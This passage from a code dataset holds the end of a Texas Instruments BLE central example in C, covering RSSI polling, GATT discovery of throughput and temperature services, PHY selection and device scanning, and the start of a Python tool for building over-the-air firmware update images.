{\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n pRssi->period = period;\n }\n // Allocate structure\n else if ((pRssi = SimpleBLECentral_RssiAlloc(connHandle)) != NULL)\n {\n pRssi->period = period;\n }\n // Allocate failed\n else\n {\n return bleNoResources;\n }\n\n // Start timer\n Util_restartClock(pRssi->pClock, period);\n\n return SUCCESS;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_CancelRssi\n *\n * @brief Cancel periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n *\n * @return SUCCESS: Operation successful\n * bleIncorrectMode: No link\n */\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle)\n{\n readRssi_t *pRssi;\n\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n // Free RSSI structure\n SimpleBLECentral_RssiFree(connHandle);\n\n return SUCCESS;\n }\n\n // Not found\n return bleIncorrectMode;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiAlloc\n *\n * @brief Allocate an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if allocation failed.\n */\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == GAP_CONNHANDLE_ALL)\n {\n readRssi_t *pRssi = &readRssi[i];\n\n pRssi->pClock = (Clock_Struct *)ICall_malloc(sizeof(Clock_Struct));\n if (pRssi->pClock)\n {\n Util_constructClock(pRssi->pClock, SimpleBLECentral_readRssiHandler,\n 0, 0, false, i);\n pRssi->connHandle = connHandle;\n\n return pRssi;\n }\n }\n }\n\n // No free structure found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFind\n *\n * @brief Find an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if not found.\n */\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n return &readRssi[i];\n }\n }\n\n // Not found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFree\n *\n * @brief Free an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return none\n */\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n readRssi_t *pRssi = &readRssi[i];\n if (pRssi->pClock)\n {\n Clock_destruct(pRssi->pClock);\n\n // Free clock struct\n ICall_free(pRssi->pClock);\n pRssi->pClock = NULL;\n }\n\n pRssi->connHandle = GAP_CONNHANDLE_ALL;\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscovery\n *\n * @brief Start service discovery.\n *\n * @return none\n */\nstatic void SimpleBLECentral_startDiscovery(void)\n{\n attExchangeMTUReq_t req;\n\n // Initialize cached handles\n svcStartHdl = svcEndHdl = 0;\n\n // Free up memory for Characteristic handles\n if ( throughputHandles )\n {\n ICall_free(throughputHandles);\n throughputHandles = NULL;\n }\n\n if ( temperatureHandles )\n {\n ICall_free(temperatureHandles);\n temperatureHandles = NULL;\n }\n\n // Prep the State Machine for MTU Exchange\n discState = BLE_DISC_STATE_MTU;\n\n // Discover GATT Server's Rx MTU size\n req.clientRxMTU = maxPduSize - L2CAP_HDR_SIZE;\n\n // ATT MTU size should be set to the minimum of the Client Rx MTU\n // and Server Rx MTU values\n VOID GATT_ExchangeMTU(connHandle, &req, selfEntity);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_findSvcUuid\n *\n * @brief Find a given UUID in an advertiser's service UUID list.\n *\n * @return TRUE if service UUID found\n */\nstatic bool SimpleBLECentral_findSvcUuid(uint16_t uuid, uint8_t *pData,\n uint8_t dataLen)\n{\n uint8_t adLen;\n uint8_t adType;\n uint8_t *pEnd;\n\n pEnd = pData + dataLen - 1;\n\n // While end of data not reached\n while (pData < pEnd)\n {\n // Get length of next AD item\n adLen = *pData++;\n if (adLen > 0)\n {\n adType = *pData;\n\n // If AD type is for 16-bit service UUID\n if ((adType == GAP_ADTYPE_16BIT_MORE) ||\n (adType == GAP_ADTYPE_16BIT_COMPLETE))\n {\n pData++;\n adLen--;\n\n // For each UUID in list\n while (adLen >= 2 && pData < pEnd)\n {\n // Check for match\n if ((pData[0] == LO_UINT16(uuid)) && (pData[1] == HI_UINT16(uuid)))\n {\n // Match found\n return TRUE;\n }\n\n // Go to next\n pData += 2;\n adLen -= 2;\n }\n\n // Handle possible erroneous extra byte in UUID list\n if (adLen == 1)\n {\n pData++;\n }\n }\n else\n {\n // Go to next item\n pData += adLen;\n }\n }\n }\n\n // Match not found\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTDiscEvent\n *\n * @brief Process GATT discovery event\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg)\n{\n int i = 0;\n\n switch(discState)\n {\n case BLE_DISC_STATE_MTU:\n {\n // MTU size response received, discover simple BLE service\n if (pMsg->method == ATT_EXCHANGE_MTU_RSP)\n {\n // Use the Discovery State Machine to get service start stop handles\n discState = BLE_DISC_STATE_THROUGHPUT_SERVICE;\n\n // UUID of Service to be Discovered\n uint8_t uuid[ATT_UUID_SIZE] = { TI_BASE_UUID_128(THROUGHPUT_SERVICE_SERV_UUID) };\n\n // Discovery throughput service\n VOID GATT_DiscPrimaryServiceByUUID(connHandle, uuid, ATT_UUID_SIZE,\n selfEntity);\n }\n else {\n //Do something else if we didn't get a RSP\n }\n }\n break;\n\n case BLE_DISC_STATE_THROUGHPUT_SERVICE:\n {\n // Service found, store handles\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP &&\n pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && svcStartHdl)\n {\n // The Throughput Service Exists!\n // At this point save valid svcStartHdl and svcEndHdl\n // A write can be performed if needed to a particular UUID\n // Defined in the profile's header file\n // Further discovery is needed to determine characteristic value handles\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_THROUGHPUT_CHAR;\n\n // Find all characteristics within our throughput service\n VOID GATT_DiscAllChars(connHandle, svcStartHdl, svcEndHdl, selfEntity);\n }\n }\n break;\n\n case BLE_DISC_STATE_THROUGHPUT_CHAR:\n {\n // Characteristics found, store handles\n if ((pMsg->method == ATT_READ_BY_TYPE_RSP) &&\n (pMsg->msg.readByTypeRsp.numPairs > 0))\n {\n // Allocate space for the handle UUID pairs\n throughputHandles = ICall_malloc(sizeof(CharProfileHdl_t) * pMsg->msg.readByTypeRsp.numPairs);\n\n // Note there are 16 bytes in a 128bit UUID + 2 bytes for the Handle\n // 18 bytes of information need to be copied\n // the remaining 3 bytes indiated in the length field is due to\n // Header information the stack uses.\n for (i = 0; i < pMsg->msg.readByTypeRsp.numPairs; i++)\n {\n // Due to the difference between the structure and the data given, apply some logic to\n // extract out the correct information (ie, ignore the 3 byte header)\n CharProfileHdl_t* temp = (CharProfileHdl_t*)((pMsg->msg.readByTypeRsp.pDataList + 3) + (pMsg->msg.readByTypeRsp.len * i));\n\n throughputHandles[i].charHdl = temp->charHdl;\n memcpy(throughputHandles[i].addr, temp->addr, ATT_UUID_SIZE);\n }\n // Now verify that the UUIDs are in the order the indexes are\n // We'll skip this step, as the way we implemented the profile on\n // the peripheral always responds with PDU first then PHY characteristics\n\n // This means we can index throughputHandles like throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU]\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && throughputHandles)\n {\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Throughput Service Found, Starting Throughput\");\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_TEMPERATURE_SERVICE;\n svcStartHdl = svcEndHdl = 0;\n\n // UUID of Service to be Discovered\n uint8_t uuid[ATT_UUID_SIZE] = { TI_BASE_UUID_128(TEMPERATURE_SERVICE_SERV_UUID) };\n\n // Discovery throughput service\n VOID GATT_DiscPrimaryServiceByUUID(connHandle, uuid, ATT_UUID_SIZE,\n selfEntity);\n }\n }\n break;\n\n case BLE_DISC_STATE_TEMPERATURE_SERVICE:\n {\n // Service found, store handles\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP &&\n pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && svcStartHdl)\n {\n // The Throughput Service Exists!\n // At this point save valid svcStartHdl and svcEndHdl\n // A write can be performed if needed to a particular UUID\n // Defined in the profile's header file\n // Further discovery is needed to determine characteristic value handles\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_TEMPERATURE_CHAR;\n\n // Find all characteristics within our throughput service\n VOID GATT_DiscAllChars(connHandle, svcStartHdl, svcEndHdl, selfEntity);\n }\n }\n break;\n\n case BLE_DISC_STATE_TEMPERATURE_CHAR:\n {\n // Characteristics found, store handles\n if ((pMsg->method == ATT_READ_BY_TYPE_RSP) &&\n (pMsg->msg.readByTypeRsp.numPairs > 0))\n {\n // Allocate space for the handle UUID pairs\n temperatureHandles = ICall_malloc(sizeof(CharProfileHdl_t) * pMsg->msg.readByTypeRsp.numPairs);\n\n // Note there are 16 bytes in a 128bit UUID + 2 bytes for the Handle\n // 18 bytes of information need to be copied\n // the remaining 3 bytes indiated in the length field is due to\n // Header information the stack uses.\n for (i = 0; i < pMsg->msg.readByTypeRsp.numPairs; i++)\n {\n // Due to the difference between the structure and the data given, apply some logic to\n // extract out the correct information (ie, ignore the 3 byte header)\n CharProfileHdl_t* temp = (CharProfileHdl_t*)((pMsg->msg.readByTypeRsp.pDataList + 3) + (pMsg->msg.readByTypeRsp.len * i));\n\n temperatureHandles[i].charHdl = temp->charHdl;\n memcpy(temperatureHandles[i].addr, temp->addr, ATT_UUID_SIZE);\n }\n // Now verify that the UUIDs are in the order the indexes are\n // We'll skip this step, as the way we implemented the profile on\n // the peripheral always responds with PDU first then PHY characteristics\n\n // This means we can index temperatureHandles like temperatureHandles[THROUGHPUT_SERVICE_UPDATE_PDU]\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && temperatureHandles)\n {\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Throughput & Temperature Services Found!\");\n\n discState = BLE_DISC_STATE_IDLE;\n\n SimpleBLECentral_enqueueMsg(SBC_ENABLE_TEMPERATURE_NOTI_EVT, SUCCESS, NULL);\n }\n }\n break;\n\n default:\n {\n // Do something meaningful here if we have an issue\n discState = BLE_DISC_STATE_IDLE;\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Error in discovering profiles and services!\");\n }\n break;\n }\n}\n\n/*\n * Local Function to quickly check the device list\n * For a particualr Address\n */\nbool checkDevList(uint8_t* addr, uint8_t* index)\n{\n int i = 0;\n\n for(i = 0; i < scanRes; i++)\n {\n if(memcmp(devList[i].addr, addr, B_ADDR_LEN) == 0)\n {\n *index = i;\n return true;\n }\n }\n\n return false;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_addDeviceInfo\n *\n * @brief Add a device to the device discovery result list\n * Info added is: BDAddr and Scan Response Data\n * It's assumed all data passed in will get freed\n *\n * @return none\n */\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType,\n uint8_t dataType, uint8_t dataLen,\n uint8_t* data)\n{\n uint8_t index;\n\n // If result count not at max\n if (scanRes < DEFAULT_MAX_SCAN_RES)\n {\n switch(dataType)\n {\n case GAP_ADRPT_ADV_IND:\n case GAP_ADRPT_ADV_SCAN_IND:\n\n if (SimpleBLECentral_findSvcUuid(THROUGHPUT_SERVICE_SERV_UUID,\n data, dataLen) &&\n SimpleBLECentral_findSvcUuid(TEMPERATURE_SERVICE_SERV_UUID,\n data, dataLen))\n {\n if (checkDevList(pAddr, &index) == false)\n {\n devList[scanRes].addrType = addrType;\n memcpy(devList[scanRes].addr, pAddr, B_ADDR_LEN);\n\n scanRes++;\n }\n }\n break;\n\n case GAP_ADRPT_SCAN_RSP:\n case GAP_ADRPT_ADV_DIRECT_IND:\n case GAP_ADRPT_ADV_NONCONN_IND:\n default:\n /* Ignore all others */\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_eventCB\n *\n * @brief Central event callback function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return TRUE if safe to deallocate event message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent)\n{\n // Forward the role event to the application\n if (SimpleBLECentral_enqueueMsg(SBC_STATE_CHANGE_EVT,\n SUCCESS, (uint8_t *)pEvent))\n {\n // App will process and free the event\n return FALSE;\n }\n\n // Caller should free the event\n return TRUE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscHandler\n *\n * @brief Clock handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_startDiscHandler(UArg a0)\n{\n Event_post(syncEvent, SBC_START_DISCOVERY_EVT);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_keyChangeHandler\n *\n * @brief Key event handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys)\n{\n SimpleBLECentral_enqueueMsg(SBC_KEY_CHANGE_EVT, keys, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_readRssiHandler\n *\n * @brief Read RSSI handler function\n *\n * @param a0 - read RSSI index\n *\n * @return none\n */\nvoid SimpleBLECentral_readRssiHandler(UArg a0)\n{\n SimpleBLECentral_enqueueMsg(SBC_RSSI_READ_EVT, SUCCESS,\n (uint8_t *)&readRssi[a0]);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n * @param pData - message data pointer.\n *\n * @return TRUE or FALSE\n */\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t state,\n void *pData)\n{\n sbcEvt_t *pMsg = ICall_malloc(sizeof(sbcEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_PHYHandler\n *\n * @brief RTOS clock handler for Coded PHY changes\n *\n * @param a0 - RTOS clock arg0.\n *\n * @return void\n */\nvoid SimpleBLECentral_PHYHandler(UArg a0)\n{\n // Check if we've changed to 1M before changing to the requested PHY\n if(phyIndex == 0 && phyConfirm)\n {\n // Because we are in a SWI, the UART Driver should not be used\n // Inform the Application task to send request\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phyClock_phyIndex);\n }\n else\n {\n // We're still tring to get to a coded PHY\n // Restart the timer\n Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doSetPhy\n *\n * @brief Set PHY preference.\n *\n * @param index - 0, 1, 2, 3\n *\n * @return always true\n */\nbool SimpleBLECentral_doSetPhy(uint8 index)\n{\n static uint8_t phy[] = {\n HCI_PHY_1_MBPS, HCI_PHY_2_MBPS, HCI_PHY_CODED, HCI_PHY_CODED\n };\n\n // Swtich to determine PHY options (needed for coded S2 and S8 mode)\n switch(index)\n {\n case 0:\n case 1:\n phyOptions = HCI_PHY_OPT_NONE;\n break;\n case 2:\n phyOptions = HCI_PHY_OPT_S2;\n break;\n case 3:\n phyOptions = HCI_PHY_OPT_S8;\n break;\n }\n\n // Generate index to send over to peripheral\n uint8_t* data = ICall_malloc(sizeof(uint8_t));\n switch(phy[index])\n {\n case HCI_PHY_1_MBPS:\n *data = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n *data = 1;\n break;\n\n case HCI_PHY_CODED:\n {\n if(phyOptions == HCI_PHY_OPT_S2)\n *data = 2;\n else if (phyOptions == HCI_PHY_OPT_S8)\n *data = 3;\n }\n break;\n }\n\n if( throughputHandles )\n {\n\n // Check if we're already using coded PHY - switch over to 1M\n // between in order to keep stability\n if(phyIndex != *data && *data >= 2 && phyIndex >= 2)\n {\n uint8_t* phy1M = ICall_malloc(sizeof(uint8_t));\n *phy1M = 0;\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phy1M);\n\n // Start A Timer to trigger a Coded PHY change\n Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n\n // Assign the requested PHY to the payload of the PHY handler\n phyClock_phyIndex = data;\n }\n else\n {\n // Inform the Application to perform a GATT write with\n // the selected size - this will tell the peripehral to change PHY\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, data);\n }\n\n }\n else\n {\n // Set this device's Phy Preference on the current connection.\n HCI_LE_SetPhyCmd(connHandle, LL_PHY_USE_PHY_PARAM, phy[index], phy[index], phyOptions);\n\n // Set this device's PHY Perference on future connections by using:\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_PHY_PARAM, phy[index], phy[index]);\n\n ICall_free(data);\n }\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doScanAndConnect\n *\n * @brief Set PHY preference.\n *\n * @param index - 0, 1, 2(, 3, 4)\n *\n * @return always true\n */\nbool SimpleBLECentral_doScanAndConnect(uint8 index)\n{\n switch (index)\n {\n case 0:\n // SELECT NEXT DEVICE ON SCAN LIST\n SBC_NextDevice();\n\n break;\n\n case 1:\n // CONNECT TO SELECTED DEVICE\n SBC_ConnectToDevice();\n\n break;\n\n case 2:\n // SCAN FOR DEVICES\n\n // Disable Scanning until completed\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_NONE, TBM_ITEM_ALL);\n\n // Indicate to the user that Scanning Has Started\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Scanning...\");\n\n // Clear the Device List\n SBC_ClearDeviceList();\n\n // Command to tell GAPRole to start scanning\n GAPCentralRole_StartDiscovery(DEFAULT_DISCOVERY_MODE,\n DEFAULT_DISCOVERY_ACTIVE_SCAN,\n DEFAULT_DISCOVERY_WHITE_LIST);\n break;\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doToggleRSSI\n *\n * @brief Toggle RSSI Readings\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doToggleRSSI(uint8 index)\n{\n // Ignored\n (void)index;\n\n if (SimpleBLECentral_RssiFind(connHandle) == NULL)\n {\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Starting\");\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n SimpleBLECentral_CancelRssi(connHandle);\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Cancelled\");\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doDisconnect\n *\n * @brief Disconnect from current Connection\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doDisconnect(uint8 index)\n{\n // Ignored\n (void)index;\n\n GAPCentralRole_TerminateLink(connHandle);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SBC_ClearDeviceList\n *\n * @brief Clear the Device List and Display.\n *\n * @return void\n */\nvoid SBC_ClearDeviceList()\n{\n // Clear the Device Display\n Display_clearLine(dispHandle, SBC_ROW_STATUS_2);\n Display_clearLine(dispHandle, SBC_ROW_STATUS_3);\n\n // Reset Scan Res indicating No Valid Scan data on Device List\n scanRes = 0;\n scanIdx = -1;\n}\n\n/*********************************************************************\n * @fn SBC_NextDevice\n *\n * @brief Select the next device on the Device List and Display.\n *\n * @return void\n */\nvoid SBC_NextDevice(){\n // Increment scanIndex to the next valid entry\n ((scanIdx + 1) == scanRes) ? scanIdx = 0 : scanIdx++;\n\n // Print the Device pointed to by the Index\n Display_print1(dispHandle, SBC_ROW_STATUS_2, 0, \"Scanned Device %d\", (scanIdx+1));\n Display_print0(dispHandle, SBC_ROW_STATUS_3, 0, Util_convertBdAddr2Str(devList[scanIdx].addr));\n}\n\n/*********************************************************************\n * @fn SBC_ConnectToDevice\n *\n * @brief Connect to the selected Device\n *\n * @return void\n */\nvoid SBC_ConnectToDevice()\n{\n // connect to current device selected by scanIdx\n uint8_t *peerAddr = devList[scanIdx].addr;\n uint8_t addrType = devList[scanIdx].addrType;\n\n // GAP Role to Connecting\n state = BLE_STATE_CONNECTING;\n\n /* Change default sup. timeout */\n GAP_SetParamValue( TGAP_CONN_EST_SUPERV_TIMEOUT, 500 );\n\n GAPCentralRole_EstablishLink(DEFAULT_LINK_HIGH_DUTY_CYCLE,\n DEFAULT_LINK_WHITE_LIST,\n addrType, peerAddr);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_performPeriodicTask\n *\n * @brief Perform a periodic application task. This function gets called\n * every five seconds (SBP_PERIODIC_EVT_PERIOD). In this example,\n * the value of the third characteristic in the SimpleGATTProfile\n * service is retrieved from the profile, and then copied into the\n * value of the the fourth characteristic.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void SimpleBLECentral_performLEDTask(void)\n{\n static uint32_t ledPin;\n\n if (state == BLE_STATE_CONNECTED) {\n ledPin = (ledPin) ? 0 : 1;\n PIN_setOutputValue(appPins, Board_RLED, 0);\n }\n else {\n ledPin = 0;\n PIN_setOutputValue(appPins, Board_RLED, 1);\n }\n\n PIN_setOutputValue(appPins, Board_GLED, ledPin);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_clockHandler\n *\n * @brief Handler function for clock timeouts.\n *\n * @param arg - event type\n *\n * @return None.\n */\nstatic void SimpleBLECentral_clockHandler(UArg arg)\n{\n // Wake up the application.\n Event_post(syncEvent, arg);\n}\n\n/*********************************************************************\n*********************************************************************/\n"
},
{
"alpha_fraction": 0.576655387878418,
"alphanum_fraction": 0.5953716039657593,
"avg_line_length": 48.5,
"blob_id": "359bfd76bef4c560270ec4c42584b4eaaca11dd6",
"content_id": "7c8f49614f03d59aaf864d57ad70bbdcdb55c33e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29600,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 598,
"path": "/tools/scripts/oad/oad_image_tool.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# Filename: oad_image_tool.py\n#\n# Description: This tool is used to generate OAD/production images for OAD\n# Enabled projects using the TI-BLE SDK.\n#\n#\n# Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n#\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the\n# distribution.\n#\n# Neither the name of Texas Instruments Incorporated nor the names of\n# its contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\n# Needs python 2.7.10\nfrom __future__ import print_function\nimport __builtin__\nimport argparse\nimport os\nimport sys\nimport struct\nimport textwrap\nimport math\nfrom collections import namedtuple\n\ntry:\n import crcmod # pip [--proxy <addr>] install crcmod\nexcept ImportError:\n print(\"Could not load module 'crcmod'. Please install package. pip [--proxy <addr>] install crcmod\")\n sys.exit(1)\n\ntry:\n from intelhex import IntelHex # pip [--proxy <addr>] install intelhex\nexcept ImportError:\n print(\"Could not load module IntelHex. Please install package. pip [--proxy <addr>] install intelhex.\")\n sys.exit(1)\n\n#tool version number\ntool_version = \"1.0\"\n# CRC related data\n# CRC Polynomial used by OAD for CC254x\n# crc16 = crcmod.mkCrcFun(0x18005, rev=False, initCrc=0x0000, xorOut=0x0000)\n# CRC Poly used by OAD for CC26xx\ncrc16 = crcmod.mkCrcFun(0x11021, rev=False, initCrc=0x0000, xorOut=0x0000)\n\n\nOAD_HDR_FMT = 'HHHH4sHBB'\nOadHdr = namedtuple('OadImgHdr', 'crc crcShdw imgVer imgLen usrId imgAddr imgType status')\n#the below dictionary contains the mapping from imgType string to an integeer\nimgTypes = {'app': 1, 'stack': 2, 'np': 3, 'production': 4 }\n\n#Meta data status field measures success as 0xFF\nMETA_STATUS_SUCCESS = 0xFF\nMETA_STATUS_PREPENDED = 0XFE\n#External flash layout (this info is in ext_flash_layout.h)\nEXT_FL_SECTOR_1_SECTOR = \"APP: 0x00000 - 0x1FFFF\"\nEXT_FL_SECTOR_2_SECTOR = \"STACK/NP: 0x20000 - 0x3FFFF\"\nEXT_FL_SECTOR_3_SECTOR = \"Factory: 0x40000 - 0x5FFFF\"\nEXT_FL_PG_SIZE = 4096\n\n#OAD defines (this info is in oad_target.h)\nOAD_BLOCK_SIZE = 16 #this value is in bytes\nOAD_METADATA_SIZE = 16 #this value is in bytes\nINT_FL_PG_SIZE = 4096 #this value is in bytes\nINT_FL_RSVD_PG1 = 0x1000\nINT_FL_RSVD_PG7 = 0x7000\nINT_FL_RSVD_PG31 = 0x1F000\n#note that only internal flash pages between 6 and 30 (inclusive) can be updated OTA for int flash OAD\nINT_FL_OAD_IMG_B_META_BEGIN = 0x9000 #First addr of on chip OAD img B\nINT_FL_OAD_IMG_B_END = 0x12FFF\nINT_FL_OAD_IMG_A_META_BEGIN = 0x600\nINT_FL_OAD_IMG_A_BEGIN = 0x100\nINT_FL_OAD_IMG_A_END = 0x8FFF\n#note that only internal flash pages between 1-30 (inclusive) can be updated OTA for ext flash OAD\nEXT_FL_OAD_META_BEGIN = 0x1000 #First addr of app space for ext flash OAD\nEXT_FL_OAD_META_END = EXT_FL_OAD_META_BEGIN + OAD_METADATA_SIZE\n\nclass TermColors:\n FAIL = '\\033[41m'\n RESET = '\\033[0m'\n\n def __init__(self):\n pass\n\ndef mem_usage(start_sect, stop_sect, segments, legalSegs=[], reqSegs=[], ih=None):\n def addr(sect, ln, col):\n return sect * 4096 + ((3 - ln) + 4 * col) * 256\n\n def calc_overlap(r1, r2):\n overlaps = max(r1[0], r2[0]) <= min(r1[1]-1, r2[1]-1)\n if overlaps:\n return min(r1[1]-1, r2[1]-1)-max(r1[0], r2[0])\n return 0\n\n ret = '|'.join([' %02d ' % i for i in xrange(start_sect, stop_sect)]) + '\\n'\n\n for line in xrange(4):\n for sect in xrange(start_sect, stop_sect):\n for col in xrange(4):\n a = addr(sect, line, col)\n overlap = max([calc_overlap([a, a + 256], seg) for seg in segments])\n if overlap == 0: sym = '-'\n elif overlap < 128: sym = '.'\n elif overlap < 255: sym = 'x'\n else:\n sym = 'X'\n if ih is not None:\n content = ih.tobinstr(a, a+255)\n if content == '\\xff'*len(content): sym = 'F'\n elif content == '\\x00'*len(content): sym = '0'\n\n if overlap:\n ret += sym if max([calc_overlap([a, a + 256], seg) for seg in legalSegs]) else TermColors.FAIL + sym + TermColors.RESET\n else:\n ret += sym if not max([calc_overlap([a, a + 256], seg) for seg in reqSegs]) else TermColors.FAIL + sym + TermColors.RESET\n ret += ' '\n ret += '\\n'\n return 